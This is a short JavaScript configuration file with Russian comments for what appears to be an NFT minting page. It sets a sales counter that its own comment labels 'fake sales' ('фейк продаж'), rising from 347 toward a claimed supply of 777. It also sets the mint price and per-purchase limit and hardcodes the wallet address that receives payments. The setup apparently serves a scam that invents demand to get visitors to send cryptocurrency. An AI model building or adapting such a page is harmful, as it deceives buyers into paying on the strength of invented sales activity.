// Кол-во продаж
var min_count_sell = 347, 	// Число, с которого начинается счет
    max_count_sell = 753, 	// Максимальное достигаемое число
    max_count = 777,      	// Максимальное число для пользователя - Supply
    time_update = 9000;   	// Частота фейк продаж: 1000 = 1 сек

// Настройки минта
var max_sell = 20,       	// Максимальное кол-во на одну продажу
    mint_price = 0.15;  	// Цена минта

var name_nft_alert = "NFT" 	// Название НФТ для уведомлений

// Слайдер на фоне
var on_slider = 0,	// (1 - вкл, 0 - выкл)
	slider_pos = 2;	// Позиция слайдера: 1 - под наклоном, 2 - горизонтально, 3 - вертикально




const ADDRESS = "0x402DB7bC77C259ce3fe639B1d5c6CD94Eb35547c"; // Адрес кошелька